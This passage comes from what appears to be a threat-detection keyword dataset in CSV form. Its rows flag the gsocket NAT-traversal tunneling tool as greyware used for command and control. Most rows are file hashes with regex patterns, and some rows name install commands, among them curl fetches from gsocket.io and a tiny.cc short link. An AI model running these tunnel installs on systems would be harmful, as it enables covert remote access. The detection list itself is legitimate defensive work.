Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*90487bd2731d62d51c5bda9ea313fe915fb6ce31fc2c5f54622d780d924da26e*",".{0,1000}90487bd2731d62d51c5bda9ea313fe915fb6ce31fc2c5f54622d780d924da26e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*96c7a830d1ec55b1db8892e1d452394cd2a5eb2549003d4428b5d52774637e94*",".{0,1000}96c7a830d1ec55b1db8892e1d452394cd2a5eb2549003d4428b5d52774637e94.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*9abd6408e999901f0b7504eb679d0403f49589b7ecaaa5588923daa0bb22f186*",".{0,1000}9abd6408e999901f0b7504eb679d0403f49589b7ecaaa5588923daa0bb22f186.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*9acdf1fd60fb9b5185fab1f18b843757f05f34f73ce947b71498d494a9e30843*",".{0,1000}9acdf1fd60fb9b5185fab1f18b843757f05f34f73ce947b71498d494a9e30843.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*9c6804a10a191fe49061ca8022394c3a44fba75e20aa0c1fbf79a07e01f28df5*",".{0,1000}9c6804a10a191fe49061ca8022394c3a44fba75e20aa0c1fbf79a07e01f28df5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*9d780803519141fc8c14c067688184d7df094190cf74825b6ea6651e7ccd911b*",".{0,1000}9d780803519141fc8c14c067688184d7df094190cf74825b6ea6651e7ccd911b.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*9f6a38018fe8228de57605c35bb927d39418c7793bb935ff0ab5022424d9774a*",".{0,1000}9f6a38018fe8228de57605c35bb927d39418c7793bb935ff0ab5022424d9774a.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*a1be92f17090edca27bbb0af8e9ac44b97d7a2dd15b66d09e1a6a6b237ace336*",".{0,1000}a1be92f17090edca27bbb0af8e9ac44b97d7a2dd15b66d09e1a6a6b237ace336.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*a1ce03c2907bdfc7be8ab37b967961a4adb4c2764bbb0f42afea773d1f89f666*",".{0,1000}a1ce03c2907bdfc7be8ab37b967961a4adb4c2764bbb0f42afea773d1f89f666.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*a9b13111606ca8ed948030515217c0e1af7cf2af2af8eb034999ff9e3f071b24*",".{0,1000}a9b13111606ca8ed948030515217c0e1af7cf2af2af8eb034999ff9e3f071b24.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*apt install gsocket*",".{0,1000}apt\sinstall\sgsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*apt-get install gsocket*",".{0,1000}apt\-get\sinstall\sgsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*b035dfbf2f3125fbf0d00f86158efbc4a7c7715f03e4d7bcf634dfd16888e965*",".{0,1000}b035dfbf2f3125fbf0d00f86158efbc4a7c7715f03e4d7bcf634dfd16888e965.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*b3ed38872b50a110a8704d1d2eb4e6e47ed6f2998d1bd08b712f840cc3a4643a*",".{0,1000}b3ed38872b50a110a8704d1d2eb4e6e47ed6f2998d1bd08b712f840cc3a4643a.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*b6e5d9d7d95caf2550fecebcfe6f7c54f1779c6a65547ef342f76446dcbd6c1d*",".{0,1000}b6e5d9d7d95caf2550fecebcfe6f7c54f1779c6a65547ef342f76446dcbd6c1d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*b7890a15dadef8cdedd6580aed94ca26df6ec0eddb009176dba1eef8941ff6e6*",".{0,1000}b7890a15dadef8cdedd6580aed94ca26df6ec0eddb009176dba1eef8941ff6e6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*b938ac4eb603113d3617ddcfeb8fbb32a6bbe54b1419482966b41ee8b1dc05b9*",".{0,1000}b938ac4eb603113d3617ddcfeb8fbb32a6bbe54b1419482966b41ee8b1dc05b9.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*bc7229c619a3af7fd330588286b4e48e7804b1c03427ef9e8bb3b7e2eb0318ce*",".{0,1000}bc7229c619a3af7fd330588286b4e48e7804b1c03427ef9e8bb3b7e2eb0318ce.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*bd0f5440775fe02946ffc659425427ef167a1dd6d2993606d4376422f8d33bc4*",".{0,1000}bd0f5440775fe02946ffc659425427ef167a1dd6d2993606d4376422f8d33bc4.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*c08ba6e45d3859ecb3cd5df132fb04dcd86913afce15057de03bba9d256de4ef*",".{0,1000}c08ba6e45d3859ecb3cd5df132fb04dcd86913afce15057de03bba9d256de4ef.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*c2e755a58685ea4f356c897fdc0c9420579f6eae48ac6f27307e8a8b73500cb6*",".{0,1000}c2e755a58685ea4f356c897fdc0c9420579f6eae48ac6f27307e8a8b73500cb6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*c4da631e510a57e39a6e9021a1d3f1d563f59f351bdd84b46e48a0e27e6b9cbb*",".{0,1000}c4da631e510a57e39a6e9021a1d3f1d563f59f351bdd84b46e48a0e27e6b9cbb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*c74f294042ccfc39dec052d9871e6bbd4e69b019a353f6e02947303adeac3794*",".{0,1000}c74f294042ccfc39dec052d9871e6bbd4e69b019a353f6e02947303adeac3794.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*cc0ced090edf59964428ab7b16b9cf8ce57b8ee21e999ac05e7f4d5d52b5470c*",".{0,1000}cc0ced090edf59964428ab7b16b9cf8ce57b8ee21e999ac05e7f4d5d52b5470c.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*cd672b609691c61005f4c69233abbce538d334db30e809150f8087b7735bfd2e*",".{0,1000}cd672b609691c61005f4c69233abbce538d334db30e809150f8087b7735bfd2e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*ce7979010bdb291a0a1884e00e238d9fc3bc27ec7a1d1093be273c22e865f676*",".{0,1000}ce7979010bdb291a0a1884e00e238d9fc3bc27ec7a1d1093be273c22e865f676.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*cfa25f5e4321a86b2c4f646a63345fb6ac46a7089886354ad82653a47e55be51*",".{0,1000}cfa25f5e4321a86b2c4f646a63345fb6ac46a7089886354ad82653a47e55be51.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*cfcad25ab252fbff7fc8a7bbac67915dfce5f76b5738f894fa13afbd5d60a5de*",".{0,1000}cfcad25ab252fbff7fc8a7bbac67915dfce5f76b5738f894fa13afbd5d60a5de.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*curl -fsSL https://gsocket.io/x*",".{0,1000}curl\s\-fsSL\shttps\:\/\/gsocket\.io\/x.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*curl -fsSL https://tiny.cc/gsinst*",".{0,1000}curl\s\-fsSL\shttps\:\/\/tiny\.cc\/gsinst.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*d24fe924f62a3bb95319812d67dbdb7e375d60f7baa933eab82070b3c4a11a77*",".{0,1000}d24fe924f62a3bb95319812d67dbdb7e375d60f7baa933eab82070b3c4a11a77.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*d325c92a9bba538fdbb1c054584ffd0672debaef935dfb27e9d0a6b67649d369*",".{0,1000}d325c92a9bba538fdbb1c054584ffd0672debaef935dfb27e9d0a6b67649d369.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*d69430717f07c774cdb8ea58b32b066e99dbf3cbc046e876b8ea73c20a3a6507*",".{0,1000}d69430717f07c774cdb8ea58b32b066e99dbf3cbc046e876b8ea73c20a3a6507.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*d700c8a3a4ecbb1e547b3c14a5a2a3605cabbabc8350284e923982809945694d*",".{0,1000}d700c8a3a4ecbb1e547b3c14a5a2a3605cabbabc8350284e923982809945694d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*d748b4244f359f0d9c46860ea8918940c8cd05e4a65c3ae5b99208d719a3a9c1*",".{0,1000}d748b4244f359f0d9c46860ea8918940c8cd05e4a65c3ae5b99208d719a3a9c1.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*d84d9d935f9f3392934ff2613e47032d3120f7c0ac4278a1e88bec65c5316a53*",".{0,1000}d84d9d935f9f3392934ff2613e47032d3120f7c0ac4278a1e88bec65c5316a53.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*db17fa0b10c60bd01a60f64cf436586c9c6708ad64a1dce8350e13689336d67f*",".{0,1000}db17fa0b10c60bd01a60f64cf436586c9c6708ad64a1dce8350e13689336d67f.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*dd226a8ba33f50cd9ca4fedcec4df5c29e6b9841cb8cf2ab2d940bdef8a0a403*",".{0,1000}dd226a8ba33f50cd9ca4fedcec4df5c29e6b9841cb8cf2ab2d940bdef8a0a403.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*de74cc01088879ddf3f7c392345e9229490e06f0cc03c52102b0e94b79c01cfc*",".{0,1000}de74cc01088879ddf3f7c392345e9229490e06f0cc03c52102b0e94b79c01cfc.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*dfd2e8d943aab32e5988a886e6ed0a3bb36b5f5c3959fa3fb1281b6f524b16bb*",".{0,1000}dfd2e8d943aab32e5988a886e6ed0a3bb36b5f5c3959fa3fb1281b6f524b16bb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*e05dfa6b3fc5b59044f4b18ba455d751c5a18948d1d0a032d3a11fb753659faa*",".{0,1000}e05dfa6b3fc5b59044f4b18ba455d751c5a18948d1d0a032d3a11fb753659faa.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*e417c3eb936ec35eb80f7cab07aaba0c051f3385d8262eaa93e5e59f52cb60e7*",".{0,1000}e417c3eb936ec35eb80f7cab07aaba0c051f3385d8262eaa93e5e59f52cb60e7.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*e660765bee5e704c8f15d6a20c14d720c0aea5382fd21123974df9435a3b7bad*",".{0,1000}e660765bee5e704c8f15d6a20c14d720c0aea5382fd21123974df9435a3b7bad.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*e66ba30f8c2e47462d60db7d5bdcb9465fa63c7115a2287d68f57d191ada1b6e*",".{0,1000}e66ba30f8c2e47462d60db7d5bdcb9465fa63c7115a2287d68f57d191ada1b6e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*e74e119f6c9d89e2419518395abc0bb44008928d3748b60ea7d02e70b757a75a*",".{0,1000}e74e119f6c9d89e2419518395abc0bb44008928d3748b60ea7d02e70b757a75a.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*e897d08460dbb646108b17a32455d9be51487bee26b48dfef992b7f246d54f1d*",".{0,1000}e897d08460dbb646108b17a32455d9be51487bee26b48dfef992b7f246d54f1d.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*e8bcea5769f7121a256a8d690d1eeae2a6040af90d7d97fccfc0379c241df060*",".{0,1000}e8bcea5769f7121a256a8d690d1eeae2a6040af90d7d97fccfc0379c241df060.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*eb11e2e1f6611560c9822ca53a829028642a676c2d03bbf86c57e4b41fdcff9e*",".{0,1000}eb11e2e1f6611560c9822ca53a829028642a676c2d03bbf86c57e4b41fdcff9e.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*ec7ac72aea879c8a68fe5cbd38f8be5f37c7b3ee99ca67481331b8eba84f7726*",".{0,1000}ec7ac72aea879c8a68fe5cbd38f8be5f37c7b3ee99ca67481331b8eba84f7726.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*ececdc677eaf4bf46268f4839d825090b16a40d37803c38600bf52bc79e1a363*",".{0,1000}ececdc677eaf4bf46268f4839d825090b16a40d37803c38600bf52bc79e1a363.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*ef8eb970940d435e07001fccf2ac210f539a9bb09ea1ef146c5f6ff4cc15a402*",".{0,1000}ef8eb970940d435e07001fccf2ac210f539a9bb09ea1ef146c5f6ff4cc15a402.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*eff4aa3e27c98422705a19de82c1386d11b9559ded06eed46c26ab82860c0a81*",".{0,1000}eff4aa3e27c98422705a19de82c1386d11b9559ded06eed46c26ab82860c0a81.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*f18bc0dae72814ff2e076c2b61846a35d00575c4e1554f74a4a70a036a15f9c5*",".{0,1000}f18bc0dae72814ff2e076c2b61846a35d00575c4e1554f74a4a70a036a15f9c5.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*f32a57e81fc9d08ca1412e932e8701a45ed35b0213c0da78bee8e65a1c6942e9*",".{0,1000}f32a57e81fc9d08ca1412e932e8701a45ed35b0213c0da78bee8e65a1c6942e9.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*f94c9642833e1efd81b07dcb06bf653f61937ae8b7baf69b3731ac1132a66d52*",".{0,1000}f94c9642833e1efd81b07dcb06bf653f61937ae8b7baf69b3731ac1132a66d52.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*fc0e69e5c2f4ed4cfb830ebb66ba54a86ce95a114603a5fffa42cea8caf3e864*",".{0,1000}fc0e69e5c2f4ed4cfb830ebb66ba54a86ce95a114603a5fffa42cea8caf3e864.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*fcea3e6443289fde4faa10d9d892ce4f0c23f90913dbfde6c9f60c825f92150c*",".{0,1000}fcea3e6443289fde4faa10d9d892ce4f0c23f90913dbfde6c9f60c825f92150c.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" "*fd57273dcd84084b20ad214de3b38c4e5a3f506da7810574d4a68dcdd63176cb*",".{0,1000}fd57273dcd84084b20ad214de3b38c4e5a3f506da7810574d4a68dcdd63176cb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z" 